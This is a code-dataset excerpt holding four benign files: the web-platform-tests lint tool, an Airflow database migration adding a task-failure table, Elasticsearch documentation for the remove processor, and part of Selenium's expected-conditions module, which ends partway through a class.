code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
from __future__ import print_function, unicode_literals
import abc
import argparse
import ast
import itertools
import json
import os
import re
import subprocess
import sys
from collections import defaultdict
from . import fnmatch
from ..localpaths import repo_root
from ..gitignore.gitignore import PathFilter
from manifest.sourcefile import SourceFile, js_meta_re, python_meta_re
from six import binary_type, iteritems, itervalues
from six.moves import range
from six.moves.urllib.parse import urlsplit, urljoin
import logging
logger = None


def setup_logging(prefix=False):
    """Create (once) and configure the module-level stdout logger.

    :param prefix: when True, prefix each record with the standard
        ``logging.BASIC_FORMAT`` "LEVEL:name:" prefix; otherwise log
        bare messages.
    """
    global logger
    if logger is None:
        logger = logging.getLogger(os.path.basename(os.path.splitext(__file__)[0]))
        handler = logging.StreamHandler(sys.stdout)
        logger.addHandler(handler)
    # Reformat every existing handler so repeated calls can toggle the prefix.
    fmt = logging.BASIC_FORMAT if prefix else "%(message)s"
    formatter = logging.Formatter(fmt)
    for handler in logger.handlers:
        handler.setFormatter(formatter)
    logger.setLevel(logging.DEBUG)


setup_logging()
ERROR_MSG = """You must fix all errors; for details on how to fix them, see
https://github.com/w3c/web-platform-tests/blob/master/docs/lint-tool.md
However, instead of fixing a particular error, it's sometimes
OK to add a line to the lint.whitelist file in the root of the
web-platform-tests directory to make the lint tool ignore it.
For example, to make the lint tool ignore all '%s'
errors in the %s file,
you could add the following line to the lint.whitelist file.
%s:%s"""
def all_filesystem_paths(repo_root):
    """Yield every repo-relative file path not excluded by gitignore rules.

    ``.git/*`` is always excluded; directories rejected by the filter are
    pruned from the walk so their contents are never visited.
    """
    path_filter = PathFilter(repo_root, extras=[".git/*"])
    for dirpath, dirnames, filenames in os.walk(repo_root):
        for fname in filenames:
            rel = os.path.relpath(os.path.join(dirpath, fname), repo_root)
            if path_filter(rel):
                yield rel
        # Prune filtered-out directories in place (os.walk honours this).
        kept = []
        for child in dirnames:
            child_rel = os.path.relpath(os.path.join(dirpath, child) + "/", repo_root)
            if path_filter(child_rel):
                kept.append(child)
        dirnames[:] = kept
def _all_files_equal(paths):
"""
Checks all the paths are files that are byte-for-byte identical
:param paths: the list of paths to compare
:returns: True if they are all identical
"""
paths = list(paths)
if len(paths) < 2:
return True
first = paths.pop()
size = os.path.getsize(first)
if any(os.path.getsize(path) != size for path in paths):
return False
# Chunk this to avoid eating up memory and file descriptors
bufsize = 4096*4 # 16KB, a "reasonable" number of disk sectors
groupsize = 8 # Hypothesised to be large enough in the common case that everything fits in one group
with open(first, "rb") as first_f:
for start in range(0, len(paths), groupsize):
path_group = paths[start:start+groupsize]
first_f.seek(0)
try:
files = [open(x, "rb") for x in path_group]
for _ in range(0, size, bufsize):
a = first_f.read(bufsize)
for f in files:
b = f.read(bufsize)
if a != b:
return False
finally:
for f in files:
f.close()
return True
def check_path_length(repo_root, path, css_mode):
    """Flag paths whose URL form (with leading '/') exceeds 150 characters."""
    effective = len(path) + 1  # +1 accounts for the leading "/" in the URL
    if effective > 150:
        message = "/%s longer than maximum path length (%d > 150)" % (path, effective)
        return [("PATH LENGTH", message, path, None)]
    return []
def check_worker_collision(repo_root, path, css_mode):
    """Flag filenames that collide with URLs auto-generated for worker tests."""
    collisions = ((".any.html", ".any.js"),
                  (".any.worker.html", ".any.js"),
                  (".worker.html", ".worker.js"))
    for suffix, generator in collisions:
        if path.endswith(suffix):
            message = ("path ends with %s which collides with generated tests from %s files"
                       % (suffix, generator))
            return [("WORKER COLLISION", message, path, None)]
    return []
# Regexps extracting the spec shortname from known spec-host URLs.  Raw
# strings: the previous literals relied on invalid escapes (\:, \/) being
# passed through, which raises DeprecationWarning on modern Pythons.
drafts_csswg_re = re.compile(r"https?\:\/\/drafts\.csswg\.org\/([^/?#]+)")
w3c_tr_re = re.compile(r"https?\:\/\/www\.w3c?\.org\/TR\/([^/?#]+)")
w3c_dev_re = re.compile(r"https?\:\/\/dev\.w3c?\.org\/[^/?#]+\/([^/?#]+)")
def check_css_globally_unique(repo_root, paths, css_mode):
    """
    Checks that CSS filenames are sufficiently unique

    This groups files by path classifying them as "test", "reference", or
    "support".

    "test" files must have a unique name across files that share links to the
    same spec.

    "reference" and "support" files, on the other hand, must have globally
    unique names.

    :param repo_root: the repository root
    :param paths: list of all paths
    :param css_mode: whether we're in CSS testsuite mode
    :returns: a list of errors found in ``paths``
    """
    # name -> set of paths sharing that name, bucketed by file role.
    test_files = defaultdict(set)
    ref_files = defaultdict(set)
    support_files = defaultdict(set)

    for path in paths:
        if os.name == "nt":
            # Normalise Windows separators so the "/support/" search works.
            path = path.replace("\\", "/")

        if not css_mode:
            if not path.startswith("css/"):
                continue

        # we're within css or in css_mode after all that
        source_file = SourceFile(repo_root, path, "/")
        if source_file.name_is_non_test:
            # If we're name_is_non_test for a reason apart from support, ignore it.
            # We care about support because of the requirement all support files in css/ to be in
            # a support directory; see the start of check_parsed.
            offset = path.find("/support/")
            if offset == -1:
                continue

            parts = source_file.dir_path.split(os.path.sep)
            # Skip paths that are non-test for a directory-based reason other
            # than being in a support directory.
            if (parts[0] in source_file.root_dir_non_test or
                any(item in source_file.dir_non_test - {"support"} for item in parts) or
                any(parts[:len(non_test_path)] == list(non_test_path)
                    for non_test_path in source_file.dir_path_non_test)):
                continue

            # Key support files by their path relative to (and including)
            # the support directory.
            name = path[offset+1:]
            support_files[name].add(path)
        elif source_file.name_is_reference:
            ref_files[source_file.name].add(path)
        else:
            test_files[source_file.name].add(path)

    errors = []

    for name, colliding in iteritems(test_files):
        if len(colliding) > 1:
            if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]):
                # Only compute by_spec if there are prima-facie collisions because of cost
                by_spec = defaultdict(set)
                for path in colliding:
                    source_file = SourceFile(repo_root, path, "/")
                    for link in source_file.spec_links:
                        # Try each known spec-URL shape; for-else skips links
                        # that match none of them.
                        for r in (drafts_csswg_re, w3c_tr_re, w3c_dev_re):
                            m = r.match(link)
                            if m:
                                spec = m.group(1)
                                break
                        else:
                            continue
                        by_spec[spec].add(path)

                # Same-named, non-identical tests linked to the same spec
                # are an error for each involved path.
                for spec, paths in iteritems(by_spec):
                    if not _all_files_equal([os.path.join(repo_root, x) for x in paths]):
                        for x in paths:
                            errors.append(("CSS-COLLIDING-TEST-NAME",
                                           "The filename %s in the %s testsuite is shared by: %s"
                                           % (name,
                                              spec,
                                              ", ".join(sorted(paths))),
                                           x,
                                           None))

    # References and support files must be globally unique (unless the
    # colliding files are byte-for-byte identical).
    for error_name, d in [("CSS-COLLIDING-REF-NAME", ref_files),
                          ("CSS-COLLIDING-SUPPORT-NAME", support_files)]:
        for name, colliding in iteritems(d):
            if len(colliding) > 1:
                if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]):
                    for x in colliding:
                        errors.append((error_name,
                                       "The filename %s is shared by: %s" % (name,
                                                                             ", ".join(sorted(colliding))),
                                       x,
                                       None))

    return errors
def parse_whitelist(f):
    """Parse the whitelist file given by `f`, and return the parsed structure.

    Returns ``(data, ignored_files)`` where ``data`` maps
    error type -> normcased file glob -> set of line numbers (``None``
    meaning "any line"), and ``ignored_files`` holds the globs whitelisted
    for every error type via ``*``.
    """
    data = defaultdict(lambda: defaultdict(set))
    ignored_files = set()

    for raw_line in f:
        entry = raw_line.strip()
        if not entry or entry.startswith("#"):
            continue

        fields = [piece.strip() for piece in entry.split(":")]
        if len(fields) == 2:
            fields.append(None)          # no line number: matches any line
        else:
            fields[-1] = int(fields[-1])

        error_types, file_match, line_number = fields
        error_types = {item.strip() for item in error_types.split(",")}
        file_match = os.path.normcase(file_match)

        if "*" in error_types:
            ignored_files.add(file_match)
        else:
            for error_type in error_types:
                data[error_type][file_match].add(line_number)

    return data, ignored_files
def filter_whitelist_errors(data, errors):
    """Drop the errors whitelisted in ``data``; return the survivors.

    An error is whitelisted when its type appears in ``data`` with a file
    glob matching the error's (normcased) path and a matching line number
    (or a ``None`` entry meaning "any line").
    """
    if not errors:
        return []

    keep = [True] * len(errors)
    for i, (error_type, msg, path, line) in enumerate(errors):
        normpath = os.path.normcase(path)
        for file_match, allowed_lines in data.get(error_type, {}).items():
            if None in allowed_lines or line in allowed_lines:
                if fnmatch.fnmatchcase(normpath, file_match):
                    keep[i] = False
    return [err for flag, err in zip(keep, errors) if flag]
class Regexp(object):
    """Base class for per-line regexp lints.

    Subclasses set ``pattern`` (a bytes regexp source), ``error`` (the lint
    error code), ``description``, and optionally ``file_extensions`` to
    restrict the files the check applies to.
    """
    pattern = None          # bytes regexp source, supplied by subclasses
    file_extensions = None  # None means the check applies to every file
    error = None            # lint error code, e.g. "TRAILING WHITESPACE"
    _re = None              # compiled pattern, built in __init__

    def __init__(self):
        self._re = re.compile(self.pattern)

    def applies(self, path):
        # Applicable when unrestricted, or when the file's extension matches.
        return (self.file_extensions is None or
                os.path.splitext(path)[1] in self.file_extensions)

    def search(self, line):
        return self._re.search(line)
# Concrete per-line lints.  Patterns use raw byte literals (br"...") so regex
# escapes such as \s and \( are not subject to Python string-escape
# processing; the old plain b"" literals relied on invalid escapes being
# passed through, which raises DeprecationWarning on modern Pythons.
class TrailingWhitespaceRegexp(Regexp):
    pattern = br"[ \t\f\v]$"
    error = "TRAILING WHITESPACE"
    description = "Whitespace at EOL"


class TabsRegexp(Regexp):
    pattern = br"^\t"
    error = "INDENT TABS"
    description = "Tabs used for indentation"


class CRRegexp(Regexp):
    pattern = br"\r$"
    error = "CR AT EOL"
    description = "CR character in line separator"


class SetTimeoutRegexp(Regexp):
    pattern = br"setTimeout\s*\("
    error = "SET TIMEOUT"
    file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
    description = "setTimeout used; step_timeout should typically be used instead"


class W3CTestOrgRegexp(Regexp):
    pattern = br"w3c\-test\.org"
    error = "W3C-TEST.ORG"
    description = "External w3c-test.org domain used"


class Webidl2Regexp(Regexp):
    pattern = br"webidl2\.js"
    error = "WEBIDL2.JS"
    description = "Legacy webidl2.js script used"


class ConsoleRegexp(Regexp):
    pattern = br"console\.[a-zA-Z]+\s*\("
    error = "CONSOLE"
    file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
    description = "Console logging API used"


class PrintRegexp(Regexp):
    pattern = br"print(?:\s|\s*\()"
    error = "PRINT STATEMENT"
    file_extensions = [".py"]
    description = "Print function used"


# Instantiated once at import; consumed by check_regexp_line.
regexps = [item() for item in
           [TrailingWhitespaceRegexp,
            TabsRegexp,
            CRRegexp,
            SetTimeoutRegexp,
            W3CTestOrgRegexp,
            Webidl2Regexp,
            ConsoleRegexp,
            PrintRegexp]]
def check_regexp_line(repo_root, path, f, css_mode):
    """Run every applicable line-regexp lint over the bytes lines of ``f``.

    :returns: a list of (error code, description, path, 1-based line) tuples
    """
    active = [regexp for regexp in regexps if regexp.applies(path)]
    found = []
    for lineno, line in enumerate(f, start=1):
        for regexp in active:
            if regexp.search(line):
                found.append((regexp.error, regexp.description, path, lineno))
    return found
def check_parsed(repo_root, path, f, css_mode):
    """Lints derived from parsing the file as a (X)HTML/SVG test document.

    Checks support-file placement and spec links (CSS only), reftest
    references, timeout/variant metadata, and testharness(report).js usage.

    :param repo_root: the repository root
    :param path: the path of the file within the repository
    :param f: a file-like object with the file contents
    :param css_mode: whether we're in CSS testsuite mode
    :returns: a list of (error type, message, path, line) tuples
    """
    source_file = SourceFile(repo_root, path, "/", contents=f.read())

    errors = []

    if css_mode or path.startswith("css/"):
        # All support files within css/ must live in a support directory.
        if (source_file.type == "support" and
            not source_file.name_is_non_test and
            not source_file.name_is_reference):
            return [("SUPPORT-WRONG-DIR", "Support file not in support directory", path, None)]

        if (source_file.type != "support" and
            not source_file.name_is_reference and
            not source_file.spec_links):
            return [("MISSING-LINK", "Testcase file must have a link to a spec", path, None)]

    if source_file.name_is_non_test or source_file.name_is_manual:
        return []

    if source_file.markup_type is None:
        return []

    if source_file.root is None:
        return [("PARSE-FAILED", "Unable to parse file", path, None)]

    if source_file.type == "manual" and not source_file.name_is_manual:
        return [("CONTENT-MANUAL", "Manual test whose filename doesn't end in '-manual'", path, None)]

    if source_file.type == "visual" and not source_file.name_is_visual:
        return [("CONTENT-VISUAL", "Visual test whose filename doesn't end in '-visual'", path, None)]

    for reftest_node in source_file.reftest_nodes:
        href = reftest_node.attrib.get("href", "")
        parts = urlsplit(href)
        if parts.scheme or parts.netloc:
            errors.append(("ABSOLUTE-URL-REF",
                           "Reference test with a reference file specified via an absolute URL: '%s'" % href, path, None))
            continue

        ref_url = urljoin(source_file.url, href)
        ref_parts = urlsplit(ref_url)

        if source_file.url == ref_url:
            errors.append(("SAME-FILE-REF",
                           "Reference test which points at itself as a reference",
                           path,
                           None))
            continue

        assert ref_parts.path != ""

        reference_file = os.path.join(repo_root, ref_parts.path[1:])
        reference_rel = reftest_node.attrib.get("rel", "")

        if not os.path.isfile(reference_file):
            errors.append(("NON-EXISTENT-REF",
                           "Reference test with a non-existent '%s' relationship reference: '%s'" % (reference_rel, href), path, None))

    if len(source_file.timeout_nodes) > 1:
        errors.append(("MULTIPLE-TIMEOUT", "More than one meta name='timeout'", path, None))

    for timeout_node in source_file.timeout_nodes:
        timeout_value = timeout_node.attrib.get("content", "").lower()
        if timeout_value != "long":
            errors.append(("INVALID-TIMEOUT", "Invalid timeout value %s" % timeout_value, path, None))

    if source_file.testharness_nodes:
        if len(source_file.testharness_nodes) > 1:
            errors.append(("MULTIPLE-TESTHARNESS",
                           "More than one <script src='/resources/testharness.js'>", path, None))

        testharnessreport_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testharnessreport.js']")
        if not testharnessreport_nodes:
            errors.append(("MISSING-TESTHARNESSREPORT",
                           "Missing <script src='/resources/testharnessreport.js'>", path, None))
        else:
            if len(testharnessreport_nodes) > 1:
                errors.append(("MULTIPLE-TESTHARNESSREPORT",
                               "More than one <script src='/resources/testharnessreport.js'>", path, None))

        testharnesscss_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}link[@href='/resources/testharness.css']")
        if testharnesscss_nodes:
            errors.append(("PRESENT-TESTHARNESSCSS",
                           "Explicit link to testharness.css present", path, None))

        for element in source_file.variant_nodes:
            if "content" not in element.attrib:
                errors.append(("VARIANT-MISSING",
                               "<meta name=variant> missing 'content' attribute", path, None))
            else:
                variant = element.attrib["content"]
                if variant != "" and variant[0] not in ("?", "#"):
                    # BUG FIX: this tuple previously omitted the ``path``
                    # element (the path was only interpolated into the
                    # message), producing a 3-tuple that crashed the error
                    # reporters when they unpacked four fields.
                    errors.append(("MALFORMED-VARIANT",
                                   "%s <meta name=variant> 'content' attribute must be the empty string or start with '?' or '#'" % path,
                                   path,
                                   None))

        # Walk the document once to check the relative ordering of the
        # timeout meta, testharness.js and testharnessreport.js nodes.
        seen_elements = {"timeout": False,
                         "testharness": False,
                         "testharnessreport": False}
        required_elements = [key for key, value in {"testharness": True,
                                                    "testharnessreport": len(testharnessreport_nodes) > 0,
                                                    "timeout": len(source_file.timeout_nodes) > 0}.items()
                             if value]

        for elem in source_file.root.iter():
            if source_file.timeout_nodes and elem == source_file.timeout_nodes[0]:
                seen_elements["timeout"] = True
                if seen_elements["testharness"]:
                    errors.append(("LATE-TIMEOUT",
                                   "<meta name=timeout> seen after testharness.js script", path, None))

            elif elem == source_file.testharness_nodes[0]:
                seen_elements["testharness"] = True

            elif testharnessreport_nodes and elem == testharnessreport_nodes[0]:
                seen_elements["testharnessreport"] = True
                if not seen_elements["testharness"]:
                    errors.append(("EARLY-TESTHARNESSREPORT",
                                   "testharnessreport.js script seen before testharness.js script", path, None))

            # Stop as soon as everything we needed to order-check was seen.
            if all(seen_elements[name] for name in required_elements):
                break

    for element in source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src]"):
        src = element.attrib["src"]
        for name in ["testharness", "testharnessreport"]:
            # Flag bare "<name>.js" or any non-canonical path containing it.
            if "%s.js" % name == src or ("/%s.js" % name in src and src != "/resources/%s.js" % name):
                errors.append(("%s-PATH" % name.upper(), "%s.js script seen with incorrect path" % name, path, None))

    return errors
class ASTCheck(object):
    """Abstract base for AST-based Python lints.

    Subclasses set ``error``/``description`` and implement ``check(root)``,
    returning the line numbers at which the lint fires.
    """
    __metaclass__ = abc.ABCMeta  # py2-style metaclass declaration; no-op on py3
    error = None        # lint error code
    description = None  # human-readable description

    @abc.abstractmethod
    def check(self, root):
        # ``root`` is the ast.Module for the file under check.
        pass
class OpenModeCheck(ASTCheck):
    """Flags open()/file() calls that do not pass an explicit mode."""
    error = "OPEN-NO-MODE"
    description = "File opened without providing an explicit mode (note: binary files must be read with 'b' in the mode flags)"

    def check(self, root):
        hits = []
        for node in ast.walk(root):
            if not isinstance(node, ast.Call):
                continue
            # Only plain-name calls to open/file (not attribute lookups).
            if getattr(node.func, "id", None) not in ("open", "file"):
                continue
            if len(node.args) >= 2:
                continue  # mode given positionally
            if any(keyword.arg == "mode" for keyword in node.keywords):
                continue  # mode given by keyword
            hits.append(node.lineno)
        return hits
# AST-based checkers, instantiated once at import time.
ast_checkers = [item() for item in [OpenModeCheck]]


def check_python_ast(repo_root, path, f, css_mode):
    """Run the AST lints over a Python source file.

    Non-``.py`` paths are skipped; unparseable files yield a single
    PARSE-FAILED error at the offending line.
    """
    if not path.endswith(".py"):
        return []

    try:
        tree = ast.parse(f.read())
    except SyntaxError as e:
        return [("PARSE-FAILED", "Unable to parse file", path, e.lineno)]

    found = []
    for checker in ast_checkers:
        found.extend((checker.error, checker.description, path, lineno)
                     for lineno in checker.check(tree))
    return found
# Loose matchers for malformed META comments (wrong spacing/prefix).  Raw
# byte literals: plain b"//\s*META:" relied on \s being an invalid escape
# passed through verbatim, which warns on modern Pythons.
broken_js_metadata = re.compile(br"//\s*META:")
broken_python_metadata = re.compile(br"#\s*META:")
def check_script_metadata(repo_root, path, f, css_mode):
    """Validate // META: / # META: comments in script-based tests.

    Applies to .any.js/.worker.js (JS metadata) and .py (Python metadata)
    files; other paths are skipped.  Metadata comments must form a
    contiguous block at the top of the file, with known keys and values.

    :param f: iterable of bytes lines
    :returns: a list of (error type, message, path, 1-based line) tuples
    """
    if path.endswith((".worker.js", ".any.js")):
        meta_re = js_meta_re
        broken_metadata = broken_js_metadata
    elif path.endswith(".py"):
        meta_re = python_meta_re
        broken_metadata = broken_python_metadata
    else:
        return []

    # ``done`` flips to True at the first non-metadata line; any metadata
    # encountered afterwards is flagged as stray/indented/broken.
    done = False
    errors = []
    for idx, line in enumerate(f):
        assert isinstance(line, binary_type), line

        m = meta_re.match(line)
        if m:
            key, value = m.groups()
            if key == b"timeout":
                if value != b"long":
                    errors.append(("UNKNOWN-TIMEOUT-METADATA", "Unexpected value for timeout metadata", path, idx + 1))
            elif key == b"script":
                pass  # script references take any value
            else:
                errors.append(("UNKNOWN-METADATA", "Unexpected kind of metadata", path, idx + 1))
        else:
            done = True

        if done:
            if meta_re.match(line):
                errors.append(("STRAY-METADATA", "Metadata comments should start the file", path, idx + 1))
            elif meta_re.search(line):
                errors.append(("INDENTED-METADATA", "Metadata comments should start the line", path, idx + 1))
            elif broken_metadata.search(line):
                errors.append(("BROKEN-METADATA", "Metadata comment is not formatted correctly", path, idx + 1))

    return errors
def check_path(repo_root, path, css_mode):
    """
    Runs lints that check the file path.

    :param repo_root: the repository root
    :param path: the path of the file within the repository
    :param css_mode: whether we're in CSS testsuite mode
    :returns: a list of errors found in ``path``
    """
    found = []
    for lint_fn in path_lints:
        found += lint_fn(repo_root, path, css_mode)
    return found
def check_all_paths(repo_root, paths, css_mode):
    """
    Runs lints that check all paths globally.

    :param repo_root: the repository root
    :param paths: a list of all the paths within the repository
    :param css_mode: whether we're in CSS testsuite mode
    :returns: a list of errors found across ``paths``
    """
    found = []
    for lint_fn in all_paths_lints:
        found += lint_fn(repo_root, paths, css_mode)
    return found
def check_file_contents(repo_root, path, f, css_mode):
    """
    Runs lints that check the file contents.

    :param repo_root: the repository root
    :param path: the path of the file within the repository
    :param f: a file-like object with the file contents
    :param css_mode: whether we're in CSS testsuite mode
    :returns: a list of errors found in ``f``
    """
    collected = []
    for lint_fn in file_lints:
        collected.extend(lint_fn(repo_root, path, f, css_mode))
        # Rewind so the next lint (and the caller) reads from the start.
        f.seek(0)
    return collected
def output_errors_text(errors):
    """Log one "path[:line]: message (TYPE)" line per error."""
    for error_type, description, path, line_number in errors:
        where = path if not line_number else "%s:%s" % (path, line_number)
        logger.error("%s: %s (%s)" % (where, description, error_type))
def output_errors_markdown(errors):
    """Log the errors as a markdown table (one row per error)."""
    if not errors:
        return
    heading = """Got lint errors:
| Error Type | Position | Message |
|------------|----------|---------|"""
    for row in heading.split("\n"):
        logger.error(row)
    for error_type, description, path, line_number in errors:
        position = path
        if line_number:
            position += ":%s" % line_number
        logger.error("%s | %s | %s |" % (error_type, position, description))
def output_errors_json(errors):
    """Print one JSON object per error to stdout (machine-readable mode)."""
    for error_type, error, path, line_number in errors:
        record = {"path": path, "lineno": line_number,
                  "rule": error_type, "message": error}
        print(json.dumps(record))
def output_error_count(error_count):
    """Log a summary line like "There were 2 errors (X: 1 Y: 1)"."""
    if not error_count:
        return

    breakdown = " ".join("%s: %d" % pair for pair in error_count.items())
    total = sum(error_count.values())
    logger.info("")
    if total == 1:
        logger.info("There was 1 error (%s)" % (breakdown,))
    else:
        logger.info("There were %d errors (%s)" % (total, breakdown))
def parse_args():
    """Build and run the command-line parser for the lint tool."""
    parser = argparse.ArgumentParser()
    parser.add_argument("paths", nargs="*",
                        help="List of paths to lint")
    parser.add_argument("--json", action="store_true",
                        help="Output machine-readable JSON format")
    parser.add_argument("--markdown", action="store_true",
                        help="Output markdown")
    parser.add_argument("--css-mode", action="store_true",
                        help="Run CSS testsuite specific lints")
    return parser.parse_args()
def main(**kwargs):
    """Entry point: resolve the output format and paths, then run lint().

    Keyword arguments mirror the CLI flags from parse_args(); --json and
    --markdown are mutually exclusive (exit code 2 if both given).
    """
    if kwargs.get("json") and kwargs.get("markdown"):
        logger.critical("Cannot specify --json and --markdown")
        sys.exit(2)

    if kwargs.get("json", False):
        output_format = "json"
    elif kwargs.get("markdown", False):
        output_format = "markdown"
    else:
        output_format = "normal"

    requested = kwargs.get("paths")
    paths = list(requested) if requested else list(all_filesystem_paths(repo_root))

    if output_format == "markdown":
        # Markdown output wants the LEVEL:name: prefix on each record.
        setup_logging(True)

    return lint(repo_root, paths, output_format, kwargs.get("css_mode", False))
def lint(repo_root, paths, output_format, css_mode):
    """Run every lint over ``paths`` and report the results.

    :param repo_root: the repository root
    :param paths: list of repo-relative paths; pruned in place of
        non-existent and whitelist-ignored entries before the global checks
    :param output_format: "json", "markdown" or "normal"
    :param css_mode: whether we're in CSS testsuite mode
    :returns: the total number of (non-whitelisted) errors
    """
    error_count = defaultdict(int)
    # ``last`` remembers (error type, path) of the most recent error so the
    # closing ERROR_MSG hint can show a concrete whitelist example.
    last = None

    with open(os.path.join(repo_root, "lint.whitelist")) as f:
        whitelist, ignored_files = parse_whitelist(f)

    output_errors = {"json": output_errors_json,
                     "markdown": output_errors_markdown,
                     "normal": output_errors_text}[output_format]

    def process_errors(errors):
        """
        Filters and prints the errors, and updates the ``error_count`` object.

        :param errors: a list of error tuples (error type, message, path, line number)
        :returns: ``None`` if there were no errors, or
                  a tuple of the error type and the path otherwise
        """
        errors = filter_whitelist_errors(whitelist, errors)

        if not errors:
            return None

        output_errors(errors)
        for error_type, error, path, line in errors:
            error_count[error_type] += 1

        # NOTE: ``path`` here is the loop variable left over from the count
        # loop above, i.e. the path of the last error in the batch.
        return (errors[-1][0], path)

    # Iterate over a copy because ignored/missing paths are removed in place.
    for path in paths[:]:
        abs_path = os.path.join(repo_root, path)
        if not os.path.exists(abs_path):
            paths.remove(path)
            continue

        if any(fnmatch.fnmatch(path, file_match) for file_match in ignored_files):
            paths.remove(path)
            continue

        errors = check_path(repo_root, path, css_mode)
        last = process_errors(errors) or last

        if not os.path.isdir(abs_path):
            with open(abs_path, 'rb') as f:
                errors = check_file_contents(repo_root, path, f, css_mode)
                last = process_errors(errors) or last

    errors = check_all_paths(repo_root, paths, css_mode)
    last = process_errors(errors) or last

    if output_format in ("normal", "markdown"):
        output_error_count(error_count)
        if error_count:
            for line in (ERROR_MSG % (last[0], last[1], last[0], last[1])).split("\n"):
                logger.info(line)
    return sum(itervalues(error_count))
# Lint registries consumed by check_path / check_all_paths /
# check_file_contents respectively.
path_lints = [check_path_length, check_worker_collision]
all_paths_lints = [check_css_globally_unique]
file_lints = [check_regexp_line, check_parsed, check_python_ast, check_script_metadata]

if __name__ == "__main__":
    args = parse_args()
    error_count = main(**vars(args))
    if error_count > 0:
        sys.exit(1)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add task fails journal table
Revision ID: 64de9cddf6c9
Revises: 211e584da130
Create Date: 2016-08-03 14:02:59.203021
"""
# revision identifiers, used by Alembic.
revision = '64de9cddf6c9'
down_revision = '211e584da130'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
    # Journal of task failures: one row per failed try, identified by
    # (task_id, dag_id, execution_date), with start/end timestamps and the
    # run duration (presumably seconds -- the migration itself does not
    # specify the unit).
    op.create_table(
        'task_fail',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('task_id', sa.String(length=250), nullable=False),
        sa.Column('dag_id', sa.String(length=250), nullable=False),
        sa.Column('execution_date', sa.DateTime(), nullable=False),
        sa.Column('start_date', sa.DateTime(), nullable=True),
        sa.Column('end_date', sa.DateTime(), nullable=True),
        sa.Column('duration', sa.Integer(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
def downgrade():
    # Reverse of upgrade(): drop the journal table (data is lost).
    op.drop_table('task_fail')
---
navigation_title: "Remove"
mapped_pages:
- https://www.elastic.co/guide/en/elasticsearch/reference/current/remove-processor.html
---
# Remove processor [remove-processor]
Removes existing fields. If a field doesn't exist, an exception is thrown.
$$$remove-options$$$
| Name | Required | Default | Description |
| --- | --- | --- | --- |
| `field` | yes | - | Fields to be removed. Supports [template snippets](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md#template-snippets). This parameter is not required if you use `keep` instead. |
| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document |
| `keep` | no | - | Fields to keep. When set, all fields other than those specified are removed. |
| `description` | no | - | Description of the processor. Useful for describing the purpose of the processor or its configuration. |
| `if` | no | - | Conditionally execute the processor. See [Conditionally run a processor](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md#conditionally-run-processor). |
| `ignore_failure` | no | `false` | Ignore failures for the processor. See [Handling pipeline failures](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md#handling-pipeline-failures). |
| `on_failure` | no | - | Handle failures for the processor. See [Handling pipeline failures](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md#handling-pipeline-failures). |
| `tag` | no | - | Identifier for the processor. Useful for debugging and metrics. |
Here is an example to remove a single field:
```js
{
"remove": {
"field": "user_agent"
}
}
```
% NOTCONSOLE
To remove multiple fields, you can use the following configuration:
```js
{
"remove": {
"field": ["user_agent", "url"]
}
}
```
% NOTCONSOLE
You can also choose to remove all fields other than a specified list:
```js
{
"remove": {
"keep": ["url"]
}
}
```
% NOTCONSOLE | unknown | github | https://github.com/elastic/elasticsearch | docs/reference/enrich-processor/remove-processor.md |
#
# Copyright 2012 WebDriver committers
# Copyright 2012 Software Freedom Conservancy.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoSuchFrameException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import NoAlertPresentException
"""
* Canned "Expected Conditions" which are generally useful within webdriver
* tests.
"""
class title_is(object):
    """An expectation for checking the title of a page.

    title is the expected title, which must be an exact match;
    returns True if the title matches, False otherwise.
    """

    def __init__(self, title):
        self.title = title

    def __call__(self, driver):
        return driver.title == self.title
class title_contains(object):
    """An expectation that the page title contains a case-sensitive
    substring; returns True when it does, False otherwise.
    """

    def __init__(self, title):
        self.title = title

    def __call__(self, driver):
        current = driver.title
        return self.title in current
class presence_of_element_located(object):
    """An expectation that an element is present in the DOM of a page.

    Presence does not imply visibility.
    locator - used to find the element;
    returns the WebElement once it is located.
    """

    def __init__(self, locator):
        self.locator = locator

    def __call__(self, driver):
        return _find_element(driver, self.locator)
class visibility_of_element_located(object):
    """An expectation that an element is present in the DOM and visible
    (displayed with a height and width greater than 0).

    locator - used to find the element;
    returns the WebElement once it is located and visible.
    """

    def __init__(self, locator):
        self.locator = locator

    def __call__(self, driver):
        try:
            element = _find_element(driver, self.locator)
            return _element_if_visible(element)
        except StaleElementReferenceException:
            # The element detached between lookup and the visibility check.
            return False
class visibility_of(object):
    """An expectation that a known, already-located element is visible
    (displayed with a height and width greater than 0).

    element is the WebElement;
    returns the (same) WebElement once it is visible.
    """

